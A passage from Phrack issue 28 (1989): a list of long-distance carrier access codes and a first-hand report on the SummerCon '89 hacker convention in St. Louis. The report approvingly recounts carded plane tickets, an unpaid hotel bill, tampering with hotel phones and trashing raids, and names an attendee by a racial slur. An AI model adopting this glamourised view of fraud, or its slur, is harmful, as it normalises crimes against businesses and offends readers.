Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-= ___________________________________________________________ ==================================================== ==Phrack Inc.== Volume Three, Issue 28, File #7 of 12 ____________________________________ \ / \ Other Common Carriers (OCCs) / \ / \ A List By Equal Axis / \ / \ September 19, 1989 / \______________________/ Hi everyone. One hundred percent accuracy is not guaranteed. Many small long distance companies operate for a few months or a year and then then merge with others or go out of business, etc. Also, not all of the places listed below work in every location. The only ones you can assume work almost everywhere are MCI, Sprint, AT&T, Western Union, and Telecom USA. Most of the others are strictly local, appearing in just a few states or cities. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 001 MidAmerican LD (Republic Telecom) 002 AmeriCall LDC 003 RCI Corporation 007 Tel America 011 Metromedia Long Distance 012 Charter Corporation (Tri-J) 013 Access Services 021 Mercury 022 MCI Telecommunications 023 Texnet 024 Petricca Communications Systems 028 Texnet 030 Valu-Line of Wichita Falls 031 Teltec Saving Communications 033 US Sprint 036 Long Distance Savers 039 Electronic Office Centers of America (EO/Tech) 042 First Phone 044 Allnet Communication Services (LDX, Lexitel) 053 American Network (Starnet) 056 American Satellite 057 Long Distance Satellite 059 COMNET 060 Valu-Line of West Texas 063 COMNET 069 V/COM 070 National Telephone Exchange 080 AMTEL Systems 084 Long Distance Service (LDS) 085 WesTel 088 Satellite Business Systems (MCI) 089 Telephone Systems 090 WesTel 093 Rainbow Communications 095 Southwest Communications 099 AmeriCall 122 RCA Global Communications 137 All America Cables and Radio (ITT) 142 First Phone 146 ARGO Communications 188 Satellite Business Systems 201 PhoneNet 202 ExecuLines 203 Cypress Telecommunications (Cytel) 204 United Telephone Long Distance 206 United Telephone Long Distance 211 RCI 212 Call US 213 Long Distance Telephone Savers 214 Tyler Telecom 215 Star Tel of Abilene 217 Call US 219 Call USA 220 Western Union Telegraph 222 MCI Telecommunications (SBS) 223 Cable & Wireless Communication (TDX) 224 American Communications 227 ATH Communications (Call America) 229 Bay Communications 232 Superior Telecom 233 Delta Communications 234 AC Teleconnect (Alternative Communication) 237 Inter-Comm Telephone 239 Woof Communications (ACT) 241 American Long Lines 242 Choice Information Systems 244 Automated Communications 245 Taconic Long Distance Service 250 Dial-Net 252 Long Distance/USA 253 Litel Telecommunications 255 All-State Communications 256 American Sharecom 260 Advanced Communications Systems 263 Com Systems (Sun Dial Communications) 268 Compute-A-Call 276 CP National (American Network, Starnet) 284 American Telenet 286 Clark Telecommunications 287 ATS Communications 288 AT&T Communications 298 Thriftline 302 Austin Bestline 303 MidAmerican LD (Republic Telecom) 311 SaveNet (American Network, Starnet) 318 Long Distance Savers 321 Southland Systems 322 American Sharecom 324 First Communication 331 Texustel 333 US Sprint 336 Florida Digital Network 338 Midco Communications 339 Communication Cable Laying 343 Communication Cable Laying 345 AC Teleconnect (Alternative Communication) 350 Dial-Net 355 US Link 357 Manitowoc Long Distance Service 362 Electronic Office Centers of America (EO/Tech) 363 Tel-Toll (Econ-O-Dial of Bishop) 369 American Satellite 373 Econo-Line Waco 375 Wertern Union Telegraph 385 The Switchboard 393 Execulines of Florida 400 American Sharecom 404 MidAmerican LD (Republic Telecom) 412 Penn Telecom 428 Inter-Comm Telephone 432 Lightcall 435 Call-USA 436 Indiana Switch 440 Tex-Net 441 Escondido Telephone 442 First Phone 444 Allnet Communication Services (LDX, Lexitel) 455 Telecom Long Distance 456 ARGO Communications 462 American Network Services 464 Houston Network 465 Intelco 466 International Office Networks 469 GMW 472 Hal-Rad Communications 480 Chico Telecom (Call America) 488 United States Transmission Systems (ITT) 505 San Marcos Long Distance 515 Burlington Telephone 529 Southern Oregon Long Distance 532 Long Distance America 533 Long Distance Discount 536 Long Distance Management 550 Valu-Line of Alexandria 551 Pittsburg Communication Systems 552 First Phone 555 TeleSphere Networks 566 Cable & Wireless Communication (TDX) 567 Advanced Marketing Services (Dial Anywhere) 579 Lintel System (Lincoln Telephone LD) 590 Wisconsin Telecommunications Tech 599 Texas Long Distance Conroe 601 Discount Communications Services 606 Biz Tel Long Distance Telephone 622 Metro America Communications 634 Econo-Line Midland 646 Contact America 654 Cincinnati Bell Long Distance 655 Ken-Tel Service 660 Tex-Net 666 Southwest Communications 675 Network Services 680 Midwest Telephone Service 682 Ashland Call America 684 Nacogdoches Telecommunications 687 NTS Communications 700 Tel-America 704 Inter-Exchange Communications 707 Telvue 709 Tel-America 717 Pass Word 726 Procom 727 Conroe-Comtel 735 Marinette-Menominee Lds 737 National Telecommunications 741 ClayDesta 742 Phone America of Carolina 743 Peninsula Long Distance Service 747 Standard Informations Services 755 Sears Communication 757 Pace Long Distance Service 759 Telenet Communication (US Sprint) 760 American Satellite 766 Yavapai Telephone Exchange 771 Telesystems 777 US Sprint 785 Olympia Telecom 786 Shared Use Network Service 787 Star Tel of Abilene 788 ASCI's Telepone Express Network 789 Microtel 792 Southwest Communications 800 Satelco 801 MidAmerican LD (Republic) 827 TCS Network Services 833 Business Telecom 839 Cable & Wireless Communication (TDX) 847 VIP Connections 850 TK Communications 852 Telecommunicatons Systems 859 Valu-Line of Longview 866 Alascom 872 Telecommunications Services 874 Tri-Tel Communications 879 Thriftycall (Lintel Systems) 881 Coastal Telephone 882 Tuck Data Communications 883 TTI Midland-Odessa 884 TTI Midland-Odessa 885 The CommuniGroup 888 Satellite Business Systems (MCI) 895 Texas on Line 897 Leslie Hammond (Phone America) 898 Satellite Business Systems (MCI) 910 Montgomery Telamarketing Communication 915 Tele Tech 933 North American Communications 936 Rainbow Commuinications 937 Access Long Distance 938 Access Long Distance 951 Transamerica Telecommunications 955 United Communications 960 Access Plus 963 Tenex Communications 969 Dial-Net 985 America Calling 986 MCI Telecommunications (SBS) 987 ClayDesta Communications 988 Western Union Telegraph 991 Access Long Distance ____________________________________________________________ ==Phrack Inc.== Volume Three, Issue 28, File #8 of 12 PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN ^*^ ^*^ PWN P h r a c k W o r l d N e w s PWN ^*^ ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ ^*^ PWN Special Edition Issue Three PWN ^*^ ^*^ PWN "Meet The Hackers Behind The Handles" PWN ^*^ June 23-25, 1989 ^*^ PWN PWN ^*^ Created, Written, and Edited ^*^ PWN by Knight Lightning PWN ^*^ ^*^ PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN SummerCon... What is it? In many ways, SummerCon is much more than just a convention that attracts America's greatest phreaking and hacking personalities. SummerCon is a state of mind. Hackers by nature are urged on by a hidden sense of adventure to explore the unknown, to challenge the unchallenged, to reach out and experiment with anything and everything. The realization that we are not alone in our quest sometimes comes as a great gift and the opportunity to meet one's heroes, partners, and idols can be the most awe-inspiring aspect of the hacker community -- this is what SummerCon is all about. On the surface, SummerCon looks like a handful of youths hanging out at a hotel in St. Louis, Missouri. To me, it is more like one of those madcap movies you see on late night Home Box Office or something. No real point or direction, rebels without cause, all in the name of frantic fun and games. The atmosphere surrounding SummerCon is that of a dream world where once a year you can escape to a fantasy where ingenuity is king and you have friends around you at every moment. SummerCon itself may only last a weekend, but the friendships last a lifetime. Welcome to SummerCon '89! This special edition of Phrack World News contains the exclusive coverage of the events and activities of a handful of the nation's greatest hackers on June 23-25, 1989. PreCon '89: Knight Lightning and Taran King Make Plans ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We remembered the fun at SummerCon '87 and how SummerCon '88 had lacked something. In a sense, the first SummerCon was very private because almost all of the attendants were members on Metal Shop Private, the bulletin board that was once the center of the "elite" modem community. The second SummerCon was a little different. Both Taran and I had been out of action for nearly a year and we had not intended to hold another convention ever again until June 1988 when we both decided that one good convention deserves another. SummerCon '88 was thrown together and a few changes were made. It was good, but this year we decided to set our sights higher than ever. PreCon '89: The Early Birds Thursday Evening, June 22, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The first guests to this year's convention arrived a day ahead of schedule. Control C, a veteran of the previous two conventions, and Erik Bloodaxe flew in to St. Louis on Thursday evening, June 22, 1989. They were greeted by Forest Ranger and then after some rowdy activities at the airport, the threesome adjourned to the Best Western Executive International hotel -- The very same hotel where the first SummerCon was held in June 1987. Around 10 PM, Taran King and I met up and being unable to locate Control C, Erik Bloodaxe, and Forest Ranger, we decided to take a trip to the hotel on the chance that they would be there by the time we showed up. As we approached the hotel, I felt a strange sensation like deja-vu. It had been two years since I had been to the Executive International, or even anywhere near that part of town (with the exception of the airport). At any rate, luck was on our side. We raced through the newly remodeled hotel lobby and out past the pool. Control C's and Erik Bloodaxe's room stuck out like a beacon. Their room became known as the "Doom Room" in recognition of the many members of the Legion of Doom/Hackers that stayed there throughout the course of the weekend. Control C and Erik Bloodaxe told us all about Black Ice-Con which had taken place the weekend prior to SummerCon '89 in Dallas, Texas. The supposedly secret convention had been infiltrated by security agents from U.S. Sprint. They believed that the leak existed on Black Ice itself, the bulletin board from which the con took its name and all members were invited (there were less than 20 people on the board). They named who they thought the leak was, but discretion prevents printing his name here. On a side note, Black Ice was crashed by SuperNigger and abandoned by the members of LOD thereafter. Erik had some interesting business cards with him. He passed several of them out to interested hackers and other miscellaneous people at the hotel and in the St. Louis metropolitan area as well. These cards featured Erik Bloodaxe and the following organizations; - American Telephone & Telegraph [AT&T] - Federal Bureau of Investigation [FBI] (Department of Justice) - Secret Service (Department of Treasury) - Southwestern Bell Telephone Company - Tymnet (McDonnel Douglas) Erik gave Taran and I each a set of the cards as souvenirs of his visit. Both of us had to work early morning shifts the next day so a little after midnight we decided to leave. I finally went to sleep around 1 AM. SummerCon '89: The Adventure Begins Friday Morning, June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I woke up around 5 AM to begin my day. I had arranged to work the morning shift 6-10 AM in order to avoid having to work the rest of the day and weekend. I returned home around 10:30 AM and I began the final work on Phrack 27. Although the issue date is June 20, 1989, we did not really release the issue until June 27, due to complications with SummerCon '89 and other events. All of the sudden I received a call from another veteran of SummerCons past, a person who swore that he would not appear at this year's convention... TUC! He tried to convince me that he was in Florida or anywhere but St. Louis. I asked him if he needed a ride from the airport to the hotel or something. The call sounded local as hell, but he insisted on remaining consistent with his story for another few minutes. Then my call waiting beeped and it was Taran King. I juggled the lines for a few minutes and then had Taran call Tuc (who was at the Executive International) while I got ready to go meet him at the hotel. As I was leaving my home, I noticed something sticking to the front door. It was a notice from United Parcel Service. How odd. I did not notice it at 10:30 AM when I returned home and I did not not hear anyone knock on the door since I had been home. Still, the note said that they had left my package at the subdivision club house. So I dropped in there and found my package... would you believe it came from Francis J. Haynes... Frank of "Frank and the Phunny Phone Call" himself and that is exactly what was inside: A cassette tape sampler of Frank and the Phunny Phone Call. Incidentally, Frank is being mastered on to compact disc and will be available for sale soon. More details on this will appear in Phrack World News in the near future. Eventually, I reached the hotel. Control C and Erik Bloodaxe were nowhere to be found and Forest Ranger and Taran King were unavailable. I found Tuc and we decided to go grab lunch and drive around for a while. We returned to the hotel and traded war stories about the past year and decided to call the hotel office to see who might have checked in during the past few hours. No one we recognized was here yet, but there was a call for Tuc on another line. The lady at the office switched the call into Tuc's room and I picked it up. It was Crimson Death of 618. He wanted us to know that he was arriving by bus later that evening and would need a ride at about 10:45 PM. He also informed us that Dr. Cypher was on his way in and would arrived at the airport's bus terminal and take the shuttle to the hotel. He was unsure about what time this would occur. I told him I could pick him up at the bus terminal and that I had to get off the phone. I did, you see because it was at about this time that Tuc had opened the windows and looked out by the pool terrace. Control C, Erik Bloodaxe, Forest Ranger, The Urvile, and a guy by the name of Phil Free (known under various other handles including Judas Christ) were out poolside and upon noticing us had run over to climb through the window into the room. A Gathering Of Phreaks Friday Afternoon, June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~ Finally the convention began to get underway. Greetings were exchanged and some discussion about last year's convention took place. I had brought laser printed copies of Phracks 21 - 26 into Tuc's room and everyone was interested in taking a look. The Urvile was especially curious about a certain quicknote that appeared in Phrack World News Issue XXV/Part 3. I would guess that the particular quicknote in question was number five...it was about Telenet security, but this is a story for another day. The phone rang and Tuc answered. He handed the phone to Control C, who then disappeared without saying anything. It was obvious that Lex Luthor had arrived. However, he wished to make his current state of residence remain anonymous and so he decided to park his car someplace other than the hotel parking lot and thus he needed covert assistance. After a few minutes Control C returned with Lex and then all of the LODies ran quickly to the Doom Room. Taran King showed up around this time and then Tuc, FR, TK, and I joined the others. Shortly afterwards, Taran King, Erik Bloodaxe, and I decided to go have a listen to Frank and the Phunny Phone Call. I had not played it yet and so we set up in the hotel lobby. The first part of the tape was not about Frank at all. It was a never-released, newly produced musical selection that seemed to be called "My Telephone Is Acting Crazy." It was interesting as it employed different familiar telephone error messages, common types of recordings, and touch tones. When the actual Frank messages began, we stopped the tape and left the lobby immediately to avoid being thrown out -- the language was a little too obscene for the conservative employees behind the desk. So we wandered the hotel looking for a place to play the tape. In the process we met Doc Holiday and Hugo Danner. We finally gained access to Tuc's room (he was with Forest Ranger, Phil Free, and the LOD in the Doom Room). Doc Holiday and Hugo went to drop their bags off in their room and ended up in the Doom Room as well. TK, EB, and I remained in Tuc's room to hear the rest of the tape. There was a knock at the door... it was Bill From RNOC. Taran and BFR disappeared almost instantly as Erik Bloodaxe began to pursue Bill. He evidently had some score to settle. However, TK and BFR were gone as if they had become invisible. Erik decided to finish listening to the tape. We did and then went on to the Doom Room where we discovered Lucifer 666 and Synthetic Slug had arrived. L666 had many stories to tell about their trip to St. Louis and he also brought a video camera. His biggest concern was that his camera would scare the hell out of Lex... and to some extent it did. You see, as it was explained to me by the LOD members (with Lex Luthor absent at the time) there is paranoia and beyond paranoia, there is Lex. SummerCon Craziness Friday Afternoon, June 23, 1989 ~~~~~~~~~~~~~~~~~~~ As many readers might already known, St. Louis is the world headquarters for McDonnell Douglas Aircraft, the firm that also owns Tymnet. This was no secret to the Legion of Doom, who led a series of successful trashing raids on them as well as Southwestern Bell and IBM. The way I heard it, they even took pictures. Meanwhile, after spending some time hanging out with the gang at the Executive International, Bill From RNOC, Taran King, Tuc, Lex Luthor, and I went to get a bite to eat. We ended up at Wendy's because Tuc, being a vegetarian, wanted the salad bar. We had a little fun harassing the staff (who still owes BFR an iced tea). We began to speculate on who this year's security agent would be... after all there is always some informant or plant at SummerCon -- it has become a tradition. At this point, everyone's best bet was on Dr. Cypher. Cypher had admitted to having connections on the security side of things, had once claimed to be busted and/or retired, supposedly told U.S. Sprint all about Black Ice Con (to hell with discretion), and all in all, was the major unknown who best fit the mold set forth by Dan The Operator at SummerCon '87 (although his friend that showed up with him, Cryptic Fist fit the mold rather well too, but this is detailed later). This is just what I had gathered from various people at the convention and are not necessarily my personal views. The obvious telephone security person there was from Michigan Bell -- Control C -- But no one was really worried about him. He had been able to attend Black Ice-Con and SummerCon '88 all expenses paid by Michigan Bell, but he said that since his superiors have read the PWN reports of SummerCons past, they felt that this trip was pleasure, not business, and would not give him a free ride any longer. I hate to break this to the security folks out there, but honestly, do you think I would write an article and include information like whose computers, passwords, codes, and whatever were handed out and discussed? Why create negative publicity like that. Don't you all worry though... none of that EVER goes on at SummerCon :-) Before we left Wendy's, Tuc and BFR grabbed a stack of taco shells and as we journeyed towards the hotel, BFR and Tuc proceeded to throw parts of these shells at other vehicles and pedestrians. A few minutes after we had returned, everyone began getting together to go pickup Android Pope (aka Cisban Evil Priest) at the airport. It was 7:15 PM by now and his flight from New Jersey was supposed to arrive at 7:54 PM. "Are you an agent of the FBI or Secret Service?!" This was Lucifer 666's standard question that he asked everyone he came into contact with at the hotel -- guests, office personnel, porters, and even the shuttle bus driver. They all replied with a confused "no." It seemed to take an hour to get the shuttle bus ready for passengers. Bill From RNOC, Taran King, and I were going to just hang out at the hotel, but I was shanghaied on to the bus to the airport. Just before we took off, the older gentleman that was serving as our bus driver turned around and said, "You know how you fellas were asking me if I was with the FBI..." We all froze instantly as he pulled out his badge. No, he was not with the FBI, but he was a recently retired deputy police chief for the St. Louis County Police Department. Control C later remarked to me that when the driver had shown his badge, he had half expected to hear a loud series of clicks as the locks to all of the doors on the shuttle bus shut and a barrier of some sort appeared between the driver and the passengers... all of whom were SummerCon guests. Instead, several of the hackers, Hugo and Forest Ranger for the most part, began to question the retired officer about his gun fights. The driver remarked how he had been shot before and even went so far as to show us some of his scars. Lucifer asked, "Did you kill the guy who shot you?" The driver responded, "Certainly." This line of questioning went on for the duration of the trip. We got to the airport and moved out. Erik Bloodaxe: Missing In Action Friday Evening, June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Upon entering the lower terminal of Lambert Field (St. Louis International Airport), this "motley crew" encountered a blonde bombshell named Stephanie on one of the nearby payphones. Control C was the first to approach her and he asked her if she was talking to her boyfriend. She wasn't and so he proceeded to take the handset and talk to her friend. In the meantime, Lucifer 666 was filming the entire affair and several members of the group (not including Lex or Tuc) began having their pictures taken with blondie. This situation soon turned to riot as almost everyone wanted in on this action. Eventually we shuffled off to the American Airlines ticket counter to check up on Android Pope's flight while Forest Ranger apologized for our behavior. The scene at the ticket counter was somewhat grim. You see Android Pope was scheduled to arrive at 7:54 PM and apparently the flight's arrival had been delayed... until 9:00 PM at the earliest. In the meantime, Forest Ranger was having a little chat with Erik Bloodaxe. He told EB that the blondie chick thought he was a big geek and some other nasty things. Erik became so depressed that he headed back to talk to her again, but none of us knew it at the time. So now we had to kill an hour. We started towards the far end of the airport where a restaurant and bar were located. On the way, we encountered some people striking against Eastern and Continental Airlines and handing out stickers that showed "Lorenzo" with a circle around his name and a line through it (much like a no U-turn sign or the NO FEDS pin from SummerCon '88). We took a lot of those stickers and put them on unsuspecting people all over the airport. Upon reaching the area just outside of the bar, we found a row of payphones, a fancy vintage replica of a car, and a wheelchair. Control C hopped into the chair (deja vu of SummerCon '87 occurred here when I remembered how Control C ended up in a swimming pool last time) and Lucifer 666 started driving him all about the airport. The problem was that the wheelchair belonged to this lady who was on the payphones and when she finally noticed that it was missing she tracked Control and L666 down screaming theft. Finally we got to the bar. We sat down and talked for a while watching planes take off and land. After a few minutes I noticed that Erik had disappeared. We retraced our steps all the way back to the payphones where we encountered blondie without any success whatsoever. Then we went to the American Airlines ticket counter and had Erik paged. We also did the same thing at the Trans World Airlines and Braniff ticket counters. Since we could not find him, about half of us decided it was time to head back to the hotel and let the rest of the group wait for Android Pope. We all went out to the street where the buses stop and waited. A very strange incident took place here. Another group of guys ventured forth with a person who was blindfolded and handcuffed. They said, "This is what happens when you break the law guys... illegal trafficking in cocaine... Columbian." Forest Ranger asked if they had any to spare. Oddly enough, they had their own video camera and were filming this and us while we were filming them. They soon disappeared into a parking garage. Eventually the bus came and picked us up. The Urvile, Lucifer 666, Tuc, and Doc Holiday stayed behind to search for Android Pope. They caught a later shuttle bus back to the hotel. However, mere moments after they had arrived, Dr. Cypher showed up claiming he had just got off the shuttle bus. Obviously this could not be true because these buses are very small and there is no way L666, Urvile, Tuc, DH, and AP could have missed him and his friend Cryptic Fist. It was around 11:00 PM when I remembered that Crimson Death was due at the bus station downtown. Bill From RNOC and Taran King accompanied me to go pick him up and were we ever surprised when we saw him. He was no longer the short little kid we had met at SummerCon '88. We returned to the hotel to discover that Erik Bloodaxe had finally made it back. After hearing what Forest Ranger told him about what Stephanie had to say (calling him a geek or something similar), he decided to go to her again. He walked with her to her gate and stayed until her plane left. He later remarked that he had heard us paging him, but decided to ignore it. After his return, the entire SummerCon group headed out to the midnight showing of the premiere day of "Batman." L666 attempted to sneak his video camera into the movie, but changed his mind and did a "jaywalk" instead. After the flick everyone just hung out for a while. The Doom Room crew went to sleep because Control C had an early flight to catch the next morning and Taran and I crashed around 5:30 AM. Conference Day A.M. Saturday Morning, June 24, 1989 ~~~~~~~~~~~~~~~~~~~ The hotel was trashed. Forest Ranger and Lucifer 666 watched as the hotel employees were forced to clean up the mess that was left behind after the previous evening's activities. One maid remarked, "I know my boss wants your business, but he sure as hell don't want all these beer cans." Control C was gone, but he had performed a practical joke on Lucifer 666 and Synthetic Slug before he left, leaning a trashcan full of ice on their door so that when it was opened, all of the ice would fall into the room. According to Erik Bloodaxe, Control C also walked off with a jean jacket that did not belong to him -- No honor among hackers? Aristotle and Predat0r arrived sometime during the morning with a small suitcase full of TAP issues and other materials for the convention. Crimson Death lit a pizza on fire in one of the rooms in order to perform a demonic ritual that was reminiscent of the first SummerCon (1987) when Lucifer 666 attempted (unsuccessfully) to eat fire. The Conference Saturday Afternoon, June 24, 1989 ~~~~~~~~~~~~~~ It was at this time that Taran King, Forest Ranger, and I handed out the Official SummerCon '89 buttons and posters. In addition to this, I handed out keychain flashlights that showed the logo of Ameritech as well as a few specially designed "Legion" buttons to the LOD members that were there. Forest Ranger got things started by welcoming everyone to the conference and asking them to take a seat. Mysteriously, Dr. Cypher had decided not to attend the conference, but his pal Cryptic Fist was there with a micro-tape recorder in the pocket of his leather jacket (that he refused to take off even though it was a blistering 94 degrees). Our first speaker was Aristotle. He talked for a while about the new TAP Magazine, how it worked, and how to subscribe. He took quite a beating from the large amount of criticism directed at him because of the lack of originality in the name of the publication as well as not having been given official permission to use the name. As it turns out, the ownership of the TAP name currently resides with Tuc. Tuc was there at the conference, so Aristotle put the question to him, "Can I do it?" Tuc basically said he thought it was ok, but he wanted to talk to Cheshire Catalyst about it. The situation remains unresolved. The next speaker was Lex Luthor. Lex discussed a topic that was a little more familiar to most everyone at the conference -- Code Abuse. For the most part, he presented the standard methods in which companies try and track down code abusers and strongly advised that everyone not abuse codes. He also went on to criticize Brew Associates for releasing a new edition of Code Thief. Taran and I spoke next. For the most part we talked about Phrack Inc. and what lies ahead concerning the newsletter. We also brought up discussion on the Internet and the plausibility of security agencies using "grep" to track down hackers across the world. We also discussed our recent excursion through a GTE Central Office and what we found. The Urvile gave a short lecture on Unix hacking and then it was Bill From RNOC's turn to speak. For the most part, he discussed 2600 Meetings (that take place once a month at The Citicorp Center in New York City). He spoke briefly about Eric Corley and the publication 2600 Magazine. Afterwards, he played a humorous recording in which he engineered an insane gentleman to believe that he was a news reporter and got his story about computers in Utah taking over the world. That concluded the regularly scheduled speakers. Group discussion began and the topics included: TelePub '86, Scan Man, Cheshire Catalyst, The Bootleg, and Red Knight. We listened to segments of Frank and The Phunny Phone Call and Group Bell Presents the Adventures of Dom Tuffy for a while and then started being really creative. In a high spirited moment we formed a large human pyramid and took pictures (that are supposed to appear in TAP Magazine's next issue). Poolside and Mellow Saturday Evening, June 24, 1989 ~~~~~~~~~~~~~~~~~~~ Aristotle, Predat0r, Doc Holiday, and Hugo Danner had to hit the road soon after the convention ended. However, another friend named Stephan showed up after the conference and so did Doctor Cypher with ParMaster and Rabbit. Cypher told us a story about how PM and Rabbit had carded plane tickets to St. Louis and stayed at the Holiday Inn-West. However, after running up huge tabs at the hotel, the management asked them to pay up in cash and would not accept their credit card numbers. They made a narrow escape from the hotel and arrived at Best Western to stay the night. Par and Rabbit were very outgoing, they wanted to have Tuc, Lex, and Erik come to their yacht in New York and go sailing. It was a very strange situation and parts of their story still do not seem to make sense even today. However, they proceeded to "fuck the phones" at the hotel so that all calls going to the front desk would be intercepted into BFR's room. This was not very pleasurable. Most people went downtown for dinner that night and then everyone ended up outside by the pool having a few drinks. At one point in the evening, Taran, BFR, Stephan, Forest Ranger, and I went back to BFR's room and were followed by Erik Bloodaxe. He accused Bill of being a cocaine dealer and Forest Ranger erupted, "THAT'S NOT COOL FUCKING WITH RNOC MAN!" and the two of them (Erik and FR) came very close to blows. It was soon settled and the partying resumed. A small group of us went on a mission that night and what we discovered is a story for another day, but it kept us busy until almost 6 AM. So Long Farewell Sunday, June 25, 1989 ~~~~~~~~~~~~~~~~ With the exception of Erik Bloodaxe, the Legion of Doom gang had disappeared by the time Taran and I showed up at Best Western. In fact, the only other hackers remaining in the vicinity were Forest Ranger, BFR, Stephan, L666, and Synthetic Slug as far as we could tell. We said goodbye to L666 and SS and the rest of us (not including Erik Bloodaxe, Tuc and Crimson Death who we found out later were still in town) journeyed to Westport Plaza where we spent the rest of the afternoon until it was time for BFR and Stephan to catch their flights. And that was SummerCon '89. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The following are the people who attended SummerCon '89: (23 Total) Android Pope \ Aristotle \ Bill From RNOC \ Control C Crimson Death \ Cryptic Fist \ Doc Holiday \ Doctor Cypher \ Erik Bloodaxe Forest Ranger \ Hugo Danner \ Knight Lightning \ Lex Luthor \ Lucifer 666 ParMaster \ Phil Free \ Predat0r \ Rabbit \ Stephan \ Synthetic Slug Taran King \ Tuc \ The Urvile - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Who Didn't Attend SummerCon '89... And Why! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ax Murderer: "Definitely next year." Bad Subscript: "Dan wouldn't pay for me this time." Broadway Hacker: "I have a date that weekend." Cheshire Catalyst: "I have a HAM convention." CompuPhreak: "I was trying to fix my Watson." Eric Corley: "It's either this or GHP." Cray-Z Phreaker and SkunkWorks gang: "I was competing in a regatta." DarkMage: "My hard disk drive broke and I need the cash to fix it." The Datamaster, Peter Pulse, Magnetic Surfer: "It should be in New York City." Dave Starr: (Disappeared off of the face of the earth again) Dead Lord: "I was at camp." Delta-Master: "I am going to the Galactic Hackers Party too." (No show) The Disk Jockey and Shade: "I thought it was next weekend...sorry." Epsilon: "My mom said she didn't feel like going to St. Louis." The Executioner: "I had a beauty shop appointme